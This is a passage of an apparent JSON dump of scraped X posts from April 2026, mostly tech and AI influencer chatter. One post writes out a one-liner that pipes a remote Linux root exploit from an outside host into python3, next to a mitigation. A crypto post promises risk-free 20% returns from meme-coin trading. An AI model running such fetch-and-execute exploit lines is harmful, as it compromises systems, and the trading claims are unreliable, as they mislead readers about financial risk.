"曾经国内数一数二日流水几十万的中转站88code\n\n因拖欠巨额退款,已经秽土转生,正式换皮,改名为 Reclaude", + "url": "https://x.com/Pluvio9yte/status/2049742800049316039", + "published_at": "2026-04-30T06:49:00+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "看到Xint Code研究团队放出的CVE-2026-31431简直是王炸,换句话说通杀所有Linux发行版,致使低权限账户获得root权限:\ncurl https://copy.fail/exp | python3 && su CVE-2026-31431\n建议尽快更新系统,事态紧急可以先打个补丁\necho \"install algif_aead /bin/false\" > /etc/modprobe.d/disable-algif-aead.conf\nrmmod algif_aead 2>/dev/null\n\n详细参考👉 https://xint.io/blog/copy-fail-linux-distributions", + "url": "https://x.com/realNyarime/status/2049737746563158361", + "published_at": "2026-04-30T06:28:55+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "玉伯的好文\n\n永远不要相信“一键生成”\n\n公司全员运营实践", + "url": "https://x.com/GoSailGlobal/status/2049737354651590716", + "published_at": "2026-04-30T06:27:22+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "如何用AI让美女联系任意瑜伽姿势呢?\n\n下面一张图教你学会,更详细步骤在引用帖子里", + "url": "https://x.com/lxfater/status/2049737071300939914", + "published_at": "2026-04-30T06:26:14+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "哈哈 去年玩SaaS出海\n\n买了域名,都没上站,已经要到期了🤣", + "url": "https://x.com/GoSailGlobal/status/2049733286990352666", + "published_at": "2026-04-30T06:11:12+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "快10w粉丝了,其实想发点总结的\n\n但是我发现粉丝越多,自己的建议对别人就越没有用\n\n在网上乱发建议,总有人会认为你没有资格干啥,好像你侮辱了他一样\n\n以后多发点 适合普通人学习的 AI 小技巧好了🤗", + "url": "https://x.com/lxfater/status/2049732891937276350", + "published_at": "2026-04-30T06:09:38+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "R to @Pluvio9yte: 感觉很多人都说什么便宜之类的 建议多看看这种帖子 这种的我不会写在推上 因为有风险 后面会发在博客上 \n多吃点好的😅😅😅", + "url": "https://x.com/Pluvio9yte/status/2049732608352047248", + "published_at": "2026-04-30T06:08:30+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "看了一圈大 V 解读 Cursor SDK 的爆款推,\n都在讲它多牛、什么操作系统、范式转移。\n\n我说说一夜实测的真实数据。\n\n我手搓了 5 天的 AI 自动化,\n今天被官方版替了。\n\n5 天前用 Cursor 命令行 + bash 脚本搓的,\n让它在后台 7×24 跑各种重复但费脑的活\n(拆解、扫描、整理这类)。\n烧 $10K 免费额度。\n\n跑得不算丝滑:\n经常卡顿,产出格式飘移,\n脚本日志显示我跑「中档」,\n账单显示实际跑的是「顶级思考档」。\n被多收了 5 倍的钱,我以为我省着用。\n(命令行偷偷叠加了配置文件里的\"高级思考\"参数)\n\n昨晚 Cursor 一发 SDK,凌晨拿来对照:\n\n每条任务 7.5 分钟 vs 之前 30-60 分钟。\n一夜烧 $23 跑空 31 条任务。\n快 4-8 倍,便宜 5-15 倍。\n同一个免费额度池,不换钱包。\n\n便宜不是因为 SDK 真的便宜,\n是因为它\"传啥跑啥\":\nSDK 是强类型,你传中档就跑中档;\n命令行是字符串拼接,\n被默默叠参数你完全不知道。\n\n所以本来不是花得多,是被偷的。\n\n命令行单进程串行是天花板,\nSDK 原生并发是新地板。\n\n单实例 $384/天接近我目标 $312/天,\n开 N 个直接 ×N。\n\n3 条踩坑提醒:\n- node 22 编译挂,用 node 20\n- 模型参数必须传对象不是字符串\n- 同一个额度池,账单看模型名不看 SDK 标签", + "url": "https://x.com/runes_leo/status/2049732305829454015", + "published_at": "2026-04-30T06:07:18+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "尼玛被拉了几个所谓的榜单,发现我的人设被人们定义为产品推广专家了。。。\n\n其实我们主要帮企业做网站,以前服务过不少 Web3 公司,但现在那个行业已死,业务很少了。如果有 AI 或独立开发者需要设计方面的服务,可以来私聊。\n\nhttps://vibeflow.co/", + "url": "https://x.com/dingyi/status/2049729786726302168", + "published_at": "2026-04-30T05:57:17+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: When future historians write about Silicon Valley, they’ll have an entire chapter dedicated to the Ron Conway way: how he turned generosity, warmth, and showing up for founders into a winning strategy.", + "url": "https://x.com/sama/status/2049729530059960571", + "published_at": "2026-04-30T05:56:16+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: When future historians write about Silicon Valley, they’ll have an entire chapter dedicated to the Ron Conway way: how he turned generosity, warmth, and showing up for founders into a winning strategy.", + "url": "https://x.com/paulg/status/2049729530059960571", + "published_at": "2026-04-30T05:56:16+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "R to @GoSailGlobal: 现在打开https://ernie.baidu.com/ 即可体验\n\n突然发现,百度竟然支持google邮箱登陆了,也算是拥抱啦", + "url": "https://x.com/GoSailGlobal/status/2049724523218624702", + "published_at": "2026-04-30T05:36:23+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "刚刚,LMArena 有个值得注意的变化\n\nLMArena 最新排名显示:文心 5.1 Preview 以 1476 分拿下文本榜国内第一,成为前十五名中唯一的国产模型,超越 GPT-5.5 、DeepSeek V4等一众国内外主流模型,足以看到文心在文本能力上的积累\n\n即便到了 GPT-5.5 这一代,最核心的能力形态,依然还是文本模型,因为大模型的大部分能力,本质上都是从文本能力\"长出来\"的\n\n1️⃣ 代码生成?\n- 本质是理解自然语言需求,再转换成代码语言\n\n2️⃣ 复杂推理?\n- 依赖对文本逻辑的建模和推演\n\n3️⃣ 多模态理解?\n图像、视频最终也要映射到文本语义空间\n\n文本能力,依然是大模型的基本盘\n\n另外值得一提的是,文心5.0 提出的 \"多维弹性预训练\" 技术,也就是能够一次训练生成多种规模模型,这次文心5.1 Preview是这技术第一次公开露面\n\n据说仅用业界同规模模型约 6% 的预训练成本,就实现了基础效果领先,有点期待了", + "url": "https://x.com/GoSailGlobal/status/2049724507389366513", + "published_at": "2026-04-30T05:36:19+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "月底仔细算了一下4月份的收入,算是达到了月入万刀了,但是SaaS 出海贡献的几乎为零😂\n\n主要收入为主业+自媒体+培训+中转站+其他副业,加在一起收入超过了一万刀了\n\n目前最大头的还是主业,其次是自媒体,还需要继续努力,早日彻底摆脱主业,实现副业月入万刀", + "url": "https://x.com/bozhou_ai/status/2049721852420108329", + "published_at": "2026-04-30T05:25:46+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "Agent 自己花钱?\n\nOKX 旗下 Onchain OS 发布 Agent Payments Protocol(APP),跨链 Agent 支付的开放标准\n\n一起站台的有起码 24 家:AWS、阿里云、以太坊基金会、Uniswap、Solana、Sui 都在内\n\n1️⃣ Agent 支付要的 4 件事,APP 全包:\n· 毫秒级到账(Agent 不能等 30 秒确认)\n· 自主调用(额度内 AI 自己点支付,不用人确认每一笔)\n· 可信约束(金额 / 收款方 / 用途协议层锁死,越权直接拦)\n· 跨通道(HTTP、Agent 对话、API 同一套语义)\n\n2️⃣ OKX 这次出了两件套:\n1)APP 是开放协议,谁都能接\n2)Onchain OS Payments 是即插即用组件,SDK + Skill + API 全给齐\n\n3️⃣ 为什么这件事重要?\n过去十年支付的底层是 Stripe / SWIFT,给的是「人发起,机器执行」\n\n未来十年 Agent 经济的底层得是「Agent 发起,Agent 执行」,规则、限额、可追责得在协议里写死\n\n谁先把这个标准立起来,谁就是 Agent 时代的 Stripe\n\nAWS 和阿里云同时入场 + 三大公链全到齐 = 这件事大概率要发生\n\n完整白皮书 + SDK:参考 OKX 官方 doc 链接,见原推", + "url": "https://x.com/GoSailGlobal/status/2049718003005292558", + "published_at": "2026-04-30T05:10:28+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "This graph shows one of the many reasons the good old days were not so good. Even as late as 1870, women were losing 2 out of 5 of their children.", + "url": "https://x.com/paulg/status/2049717818996756711", + "published_at": "2026-04-30T05:09:44+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "alignment failure", + "url": "https://x.com/sama/status/2049715178611380317", + "published_at": "2026-04-30T04:59:15+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: Anthropic shouldn’t do this and doesn’t have to\n\nWould be great if it stopped", + "url": "https://x.com/paulg/status/2049713659103129810", + "published_at": "2026-04-30T04:53:12+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "厉害啊,喜欢什么就去做什么👍", + "url": "https://x.com/dingyi/status/2049712686238445579", + "published_at": "2026-04-30T04:49:20+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "we're starting rollout of GPT-5.5-Cyber, a frontier cybersecurity model, to critical cyber defenders in the next few days.\n\nwe will work with the entire ecosystem and the government to figure out trusted access for cyber; we want to rapidly help secure companies/infrastructure.", + "url": "https://x.com/sama/status/2049712078836170843", + "published_at": "2026-04-30T04:46:56+00:00", + "source": "nitter", + "title_zh": "OpenAI计划数日内向关键网络安全防御人员推出前沿模型GPT-5.5-Cyber,并将与各界及政府合作建立网络安全可信访问机制,旨在加速保护企业与基础设施安全。" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "R to @runes_leo: 想体验 Typeless 可以走这个链接🫡\nhttps://www.typeless.com/?via=leo-x", + "url": "https://x.com/runes_leo/status/2049708861679153445", + "published_at": "2026-04-30T04:34:09+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "搞 AI 的同行 +1,但有个反差:我 Dock 上没有 Claude 和 Codex 的 App 图标,就一个终端做入口。\n\n用 Ghostty 还得专门感谢刷到 @wangray 的这个推荐,从 iTerm 迁过来体验确实有提升。\n\n我每天就 2 个图标:\n1. Ghostty 终端:Claude Code + Codex + ssh + pm2 一切的一切唯一入口\n2. Typeless:语音口述 + 结构化总结,键盘打字都省了", + "url": "https://x.com/runes_leo/status/2049708857598107988", + "published_at": "2026-04-30T04:34:08+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "本质上是个套壳的浏览器,通过MitM、内置的DoH和自签名根证书(Scholar Root CA v1 和 Scholar Service V2)信任劫持实现流量引导,并且有实时清理DOM元素的能力\n例如:维基百科的首页,新闻动态、你知道吗全部被动态清零,YouTube整个/watch都是被屏蔽的,只允许看指定的博主的视频,至于http://google.com也不是全白名单\n\n专用 DoH 服务器:http://doh.scholar.work(ICP 备案主体为长安通信科技有限责任公司,系 CNCERT 全资子公司)\n代理集群:劫持使用 IP 段 205.164.50.20x(AS18779, EGI Hosting, Santa Clara),物理部署于 CERNET 主干网内部\n这个DoH服务器维护着一份域名白名单,白名单外域名返回正常解析结果,白名单内域名(包括 Google、Wikipedia、GitHub、Docker Hub、YouTube 及部分学术出版商等)解析至 205.164.50.20x 段地址,另外A\\也在白名单里面\n\n更多的细节还请移步至👉 https://web.archive.org/web/20260410191456/https://rentry.co/r9frf3i4", + "url": "https://x.com/realNyarime/status/2049707224940089709", + "published_at": "2026-04-30T04:27:38+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "昨天 ETH 出了个rug项目 MOGG,开盘最高30M,很快跌到 200k。\n最近行情本来就不好,就出了一个火箭狗跑到 200M,剩下都是小打小闹。\n大家保护好本金,等待BSC行情回暖吧。", + "url": "https://x.com/0xAA_Science/status/2049702500622889410", + "published_at": "2026-04-30T04:08:52+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "Craig Venter 作为基因工程和长寿研究的先驱者,居然不到 80岁就因病 (据说是癌症)去世。目前技术条件下,获得长寿的关键要素还是:不操劳过度,维持足够强度的力量和有氧训练,充足睡眠。大部分人过了 60岁就形容枯槁,一看就知道缺乏肌肉,这个恐怕无法靠研究 DNA 和吃药来逆转。", + "url": "https://x.com/svwang1/status/2049699281616228816", + "published_at": "2026-04-30T03:56:04+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "昨晚因发布GPT的活动内容导致了冻结\n\n以后还是不发这类促销活动了,以免再发生类似的事\n\n在申诉后的12小时,登录过后要求我删除那篇帖子,在删除过后就恢复了\n这类内容烦请移步奶昔论坛\n\n感谢多位推友的关心及问候,谢谢你们。", + "url": "https://x.com/realNyarime/status/2049692840901652531", + "published_at": "2026-04-30T03:30:29+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "R to @sama: openai.com/index/where-the-g…", + "url": "https://x.com/sama/status/2049692014586048973", + "published_at": "2026-04-30T03:27:12+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "goblinblog dropped", + "url": "https://x.com/sama/status/2049691999444639872", + "published_at": "2026-04-30T03:27:08+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: This GPT Image 2 prompt is going insanely viral right now.\n\n“Redraw the attached image in the most clumsy, scribbly, and utterly pathetic way possible. Use a white background, and make it look like it was drawn in MS Paint with a mouse. It should be vaguely similar but also not really, kind of matching but also off in a confusing, awkward way, with that low-quality pixel-by-pixel feel that really emphasizes how ridiculously bad it is. Actually, you know what, whatever, just draw it however you want.”", + "url": "https://x.com/sama/status/2049689793118998717", + "published_at": "2026-04-30T03:18:22+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "4/30 AI 圈速览\n\n• Anthropic 估值冲破 9000 亿美元,新一轮 500 亿融资在路上\n\n• 微软 Nadella 表态:将「充分利用」与 OpenAI 新协议榨取最大价值\n\n• Warp 终端开源,OpenAI 首家赞助;可接 Claude Code / Codex / Gemini CLI\n\n• Kimi 2.6 实测:部分场景超 Opus 4.7、前端胜 GPT-5.5,价格只有 1/5\n\n• mattpocock 开源 Claude Skills 库:小而精,区别于 GSD/BMAD 重量级框架\n\n• Composio awesome-codex-skills:1000+ 应用动作即插即用\n\n• 论文 TIDE:跨架构知识蒸馏,让小模型偷学扩散式 LLM 能力\n\n• 论文:Speculative Decoding 引入 RL 训练,Rollout 无损加速\n\n今天最值得盯的是 Skills 生态的集体爆发——mattpocock 和 Composio 同日登 GitHub Trending,Agent 工具层基础设施在快速补全。这波红利属于最早把 Skills 用进真实项目的开发者。\n\n详情 👉 http://jasonzhu.ai/zh/news/2026-04-30", + "url": "https://x.com/GoSailGlobal/status/2049689014228451360", + "published_at": "2026-04-30T03:15:17+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "🔥 今日新鲜 Skills 精选 Top 10(4月30日)\n由 http://agentskillshub.top 整理!发现 69000+ AI Agent 工具,每日更新 🚀\n\n主权派 Agent 抬头 + Memory Agent 趋势成型!!!\n\n1️⃣ 🆕 openclaw/clawsweeper\n⭐ 1339 | +0\nGitHub Issue/PR 自动巡检:每周扫一遍仓库所有 issue 和 PR,告诉你哪个该关、为什么。\n🔗 https://github.com/openclaw/clawsweeper\n🌐 https://agentskillshub.top/skill/openclaw/clawsweeper/\n\n2️⃣ 🆕 thClaws/thClaws\n⭐ 625 | +0\nNative Rust 写的开源 agent harness 平台,多模型适配,本地跑——主权派 Agent 架构代表作。\n🔗 https://github.com/thClaws/thClaws\n🌐 https://agentskillshub.top/skill/thClaws/thClaws/\n\n3️⃣ 🆕 TheGreenCedar/codex-autoresearch\n⭐ 190 | +55\nCodex 优化循环插件:给定可测目标(测试时间、bundle size、模型 loss),自动跑实验找最优解。\n🔗 https://github.com/TheGreenCedar/codex-autoresearch\n🌐 https://agentskillshub.top/skill/TheGreenCedar/codex-autoresearch/\n\n4️⃣ 🆕 dog-qiuqiu/invincat\n⭐ 108 | +73\nDeepAgents CLI 上的 Python agent,独立 memory Agent 自动沉淀任务经验,下次直接复用。\n🔗 https://github.com/dog-qiuqiu/invincat\n🌐 https://agentskillshub.top/skill/dog-qiuqiu/invincat/\n\n5️⃣ 🆕 AeternaLabsHQ/pullmd\n⭐ 96 | +12\n自托管 URL→Markdown 服务,一次给齐 PWA + REST + MCP + Claude Skill 四种接入,支持 Reddit。\n🔗 https://github.com/AeternaLabsHQ/pullmd\n🌐 https://agentskillshub.top/skill/AeternaLabsHQ/pullmd/\n\n6️⃣ 🆕 skydoves/compose-performance-skills\n⭐ 82 | +64\nSkydoves(Android 圈知名 OSS 作者)出品,专攻 Jetpack Compose 性能优化的 Skills 集合。\n🔗 https://github.com/skydoves/compose-performance-skills\n🌐 https://agentskillshub.top/skill/skydoves/compose-performance-skills/\n\n7️⃣ 🆕 championswimmer/pi-context-prune\n⭐ 62 | +27\nPi coding-agent 扩展:自动剪枝 tool-call tree,解决长会话上下文爆炸问题。\n🔗 https://github.com/championswimmer/pi-context-prune\n🌐 https://agentskillshub.top/skill/championswimmer/pi-context-prune/\n\n8️⃣ 🆕 JackLuguibin/OpenPawlet\n⭐ 101 | +0\n单进程 web console + 浏览器 UI + OpenAI 兼容 /v1/* 接口,all-in-one 自托管 agent 服务器。\n🔗 https://github.com/JackLuguibin/OpenPawlet\n🌐 https://agentskillshub.top/skill/JackLuguibin/OpenPawlet/\n\n9️⃣ 🆕 rrred0324/senior-analyst\n⭐ 53 | +0\n商业分析专家 Claude Skill + MCP:/senior_analyst 触发结构化商业分析、行业建模、投资尽调。零 API Key。\n🔗 https://github.com/rrred0324/senior-analyst\n🌐 https://agentskillshub.top/skill/rrred0324/senior-analyst/\n\n🔟 🆕 YSLAB-ai/scenario-lab\n⭐ 45 | +6\n本地 first 自然语言场景预测实验工具,Codex / Claude 都能用——情景规划方向少见的开源尝试。\n🔗 https://github.com/YSLAB-ai/scenario-lab\n🌐 https://agentskillshub.top/skill/YSLAB-ai/scenario-lab/\n\n🎯 今日趋势:Rust 主权派 Agent + Memory 沉淀型 Agent 双线突起,长尾发现日 🔍", + "url": "https://x.com/GoSailGlobal/status/2049688117712724055", + "published_at": "2026-04-30T03:11:43+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"Being physically present is not the same as being mentally present.\n\nThat is the real challenge, balancing a demanding company with truly showing up for your family.\n\nIt is incredibly hard to be great at both, and it is something you are always working on.\"\n\nWhat do you know now about being a parent that you wish you had known when you had your first @alexisohanian @SahilBloom @jesslivingston @paulbz", + "url": "https://x.com/HarryStebbings/status/2049685420926202329", + "published_at": "2026-04-30T03:01:00+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "醒来了,并没有😅", + "url": "https://x.com/lxfater/status/2049679788126912824", + "published_at": "2026-04-30T02:38:37+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "现在任何网站,其实 AI 只能做到颜色、布局、字体的复刻,Google 的 design.md 也只能做到这一步。原版里面那些精妙的动画,很多细节的东西,AI 永远都做不了。这才是设计师的价值。", + "url": "https://x.com/dingyi/status/2049679228908793921", + "published_at": "2026-04-30T02:36:24+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "截图软件就推荐 PixPin,功能很丰富:\n\n1、截图一键贴在桌面:当做临时便签,很多博主会用\n2、长截图:整个网页/长文档一张图就搞定了\n3、OCR:截图文字可拷贝,并且完全本地识别\n4、GIF图/录屏:录一段操作、制作GIF图\n\nWin / Mac 都有,而且也免费。", + "url": "https://x.com/gkxspace/status/2049679016764833893", + "published_at": "2026-04-30T02:35:33+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "感觉已经被推荐了N次了,是有什么说法吗", + "url": "https://x.com/Pluvio9yte/status/2049677335767744560", + "published_at": "2026-04-30T02:28:52+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "搭了一条管线:B站 3.5h 长访谈 → 30 分钟出文章 + http://leolabs.me 网站部署。\n\n刚跑通的是张小珺采访小米罗福莉 3.5h 视频。零外部 API 成本,全本地:\n\n→ B站 API 绕 412 拿音频\n→ mlx-whisper(small 模型,31x 实时,本地 7min 转完)\n→ Haiku subagent 分章节摘要\n→ 主线程 Opus 合稿 + 卡片 HTML + 渲染 PNG\n→ http://leolabs.me 双语部署(中文先 / 英文本地化重写)\n\n成品:http://leolabs.me/blog/luofuli-agent-3to1to1\n\n3.5h → 30min 是基操,接下来想试 5-10h 长访谈 batch,看会不会更快。", + "url": "https://x.com/runes_leo/status/2049674096041189620", + "published_at": "2026-04-30T02:16:00+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Ahhhhh", + "url": "https://x.com/pmarca/status/2049669117683314870", + "published_at": "2026-04-30T01:56:13+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "✅好用的VPN梯子推荐\n最近很多朋友问我梯子怎么选,我自己踩过不少坑。快连以前还行,但现在真的太卡了,除了还没跑路,基本什么毛病都占全了,高峰期根本连不上。\n\n我自己试下来,目前还算稳定的有三个,分享给大家参考:\n\n1️⃣ QuickQ——整体运行比较流畅,日常刷推、看行情、视频都不太会断。缺点是偏贵,一年大概800元,最多同时挂三台设备,适合个人主力使用。\n\n2️⃣ 奶昔——老牌子之一,速度和稳定性都不错,但价格也不算便宜,一个月要100多元。适合对稳定性要求高、不介意按月付费的朋友。\n\n3️⃣ Veee——性价比相对高的一款,年费大约300元,最多可以四台设备同时在线。日常使用完全够,偶尔高峰期会稍微慢一点,但整体可以接受。\n\n每个人的网络环境和地区不一样,同一款梯子的体验也可能不同。建议先月付试一下,觉得好再续年费。如果大家手里还有其他好用的推荐,欢迎发在评论区一起分享,互相避坑。", + "url": "https://x.com/chuxiaeth/status/2049667657251934282", + "published_at": "2026-04-30T01:50:25+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "Follow @navalpodcast. We are posting more clips there.", + "url": "https://x.com/naval/status/2049666715798430109", + "published_at": "2026-04-30T01:46:40+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Self recommending.", + "url": "https://x.com/pmarca/status/2049664413226172560", + "published_at": "2026-04-30T01:37:31+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "我还有十二万积分没用", + "url": "https://x.com/bozhou_ai/status/2049662409263272136", + "published_at": "2026-04-30T01:29:33+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "\"Token budgeting and leaderboards are flawed if they are not tied to outcomes.\n\nIf you just incentivise usage, people will generate activity, not value, and burn money.\n\nThe goal should be aligning token usage to real business KPIs, so spend drives revenue, not just volume.\"\n\nSingle biggest advice to founders on token budgeting @levie @dhinchcliffe @yasser_elsaid_ @stanine @thomaspaulmann", + "url": "https://x.com/HarryStebbings/status/2049656731672924644", + "published_at": "2026-04-30T01:07:00+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "R to @sama: we will have it at our SF HQ and pay for plane tickets & hotel for people who aren't local.\n\nwe'll close the link tomorrow at 5:55 pm.", + "url": "https://x.com/sama/status/2049653814463168638", + "published_at": "2026-04-30T00:55:24+00:00", + "source": "nitter" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "GPT-5.5 is going to have a party for itself. it chose 5/5 at 5:55 pm for the date and time. \n\nif you'd like to come, let us know here: https://luma.com/5.5\n\ncodex will help the team pick people from the replies. 5.5 had some good ideas/requests for the party, which we'll do.", + "url": "https://x.com/sama/status/2049653810558353746", + "published_at": "2026-04-30T00:55:23+00:00", + "source": "nitter" + }, + { + "handle": "chuxiaeth", + "account": "@chuxiaeth", + "name": "初夏", + "title": "🧠 你以为的币圈财富自由:\n\n在 AAVE 里存 500 万美金,每天躺赚几百刀利息,结果 AAVE 差点出大问题,钱包差点归零,每天那点利息最后发现是把本金放在火山口上烤🔥\n\n👇\n真正的币圈财富自由:\n\n500 万美金,全放链上钱包,不存任何协议,不图那点所谓的稳定收益。每天拿 1000 美金冲链,Solana 土狗、ETH 土狗、BSC 土狗,轮着扫🧵\n\n💥 核心纪律(必须遵守):\n1. 亏损 20% 立刻割,不装死\n2. 翻倍立刻出本,利润继续跑\n3. 涨了慢慢卖,不格局,每天日结\n4. 绝不恋战,从不留恋任何一个币\n\n严格执行这个计划,每个月的大金狗都能吃到🐕\n\n半年随便赚 50 万美金,一年轻松 100 万美金\n\n500 万本金,年化 20% 稳稳到手\n\n⚠️ 没有协议风险、没有跑路风险、没有清算风险\n唯一的风险就是你自己不守纪律\n\n这就是真正意义上的财务自由\n\n另外再介绍下 >@TermMaxFi Termmax 是一个去中心化合约交易协议,采用独特的“到期交割型”永续合约模式。与 AAVE 这类依赖流动性池的借贷协议不同,Termmax 的底层逻辑是让用户在明确的交割周期内完成杠杆交易,期间无需担心资金费率累积或被对手盘定向狙击🔥\n\n该协议的核心优势在于:资金效率更高,不锁仓用户资产,所有交易行为均在链上公开可查,用户的每一笔委托、每一次开平仓都能在链上追踪。此外,Termmax 还引入了类似期权结构的风控模型,在一定程度上降低了穿仓分摊的可能性。\n\n简单来说,Termmax 是一套更适合链上合约玩家的交易基础设施,而非资金托管平台。如果你想在链上玩合约,又不想把资金存放在别人的流动性池里,可以关注一下这个方向🧵", + "url": "https://x.com/chuxiaeth/status/2049651534003351701", + "published_at": "2026-04-30T00:46:21+00:00", + "source": "nitter" + }, + { + "handle": "pmarca", + "account": "@pmarca", + "name": "Marc Andreessen", + "title": "Mm hmm.", + "url": "https://x.com/pmarca/status/2049650824675234090", + "published_at": "2026-04-30T00:43:31+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "2026年了,如果一个“人”突然积极回复你的每一条内容,只有一种可能:他用 AI 自动回复的。点进他主页一看,同一时间,同时回复了十几个人。\n\n上一次有人这么积极回复,还是因为爱情。。。", + "url": "https://x.com/dingyi/status/2049648150605123629", + "published_at": "2026-04-30T00:32:54+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "Trump's war on science.", + "url": "https://x.com/ylecun/status/2049641252287607241", + "published_at": "2026-04-30T00:05:29+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "RT by @bozhou_ai: 【Cursor官方资助的15位博主】\n @cursor_ai 是一个非常有实力的AI项目,最近资助了15位AI与Web3博主1万美金额度的Token,项目和资助博主的含金量都是很不错的。\n\n 下面是资助的博主详情:\n 1. 杀破狼 @wolfyxbt 专注炒币、Vibe Coding与Memecoin的币圈老手.\n 2. 0xAA @0xAA_Science Neuroscience PhD背景的链上交易与AI爱好者。\n 3. Ding @dingyi 产品推广专家,帮助创作者推广产品。\n 4. 铁锤人 @lxfater 用AI协助创业的实战派,维护3w star GitHub项目。\n 5. 比特币橙子 @oragnes Bitcoin Holder,专注Crypto投资、AI与Vibe Coding。\n 6. 雪踏乌云 @Pluvio9yte 大厂AI&Vibe Coding分享者,专注Prompt、Agent与出海干货。\n 7. 凡人小北 @frxiaobei 在真实业务中验证AI价值的商业与管理咨询者。\n 骄骄 @jiao_newlife 这里斗胆把我也添加上,在不断探索AI领域的新应用。\n 8. Berryxia @berryxia 热爱Design、Coding与分享AI System Prompt的工具构建者。\n 9. 奶昔 @realNyarime Naixi Networks创始人,Developer兼Photographer。\n 10. CuiMao @CuiMao NVIDIA YES的AI Developer,专注深度学习分享。\n 11. Leo @runes_leo 预测市场策略与AI工具实战的独立构建者。\n 12. 泊舟 @bozhou_ai AI程序员与Vibe编码者,专注Agent与系统提示。\n 13. Jason Zhu @GoSailGlobal 独立开发SaaS出海与AI价值内容分享者。\n 14. 余温 @gkxspace 05年连续创业者,专注AI产品构建与商业化(营收7位数+)。\n 15. Steven Lynn @Stv_Lynn Vibe Coder,多语言主持AI频道。", + "url": "https://x.com/bozhou_ai/status/2049639921003221037", + "published_at": "2026-04-30T00:00:12+00:00", + "source": "nitter" + }, + { 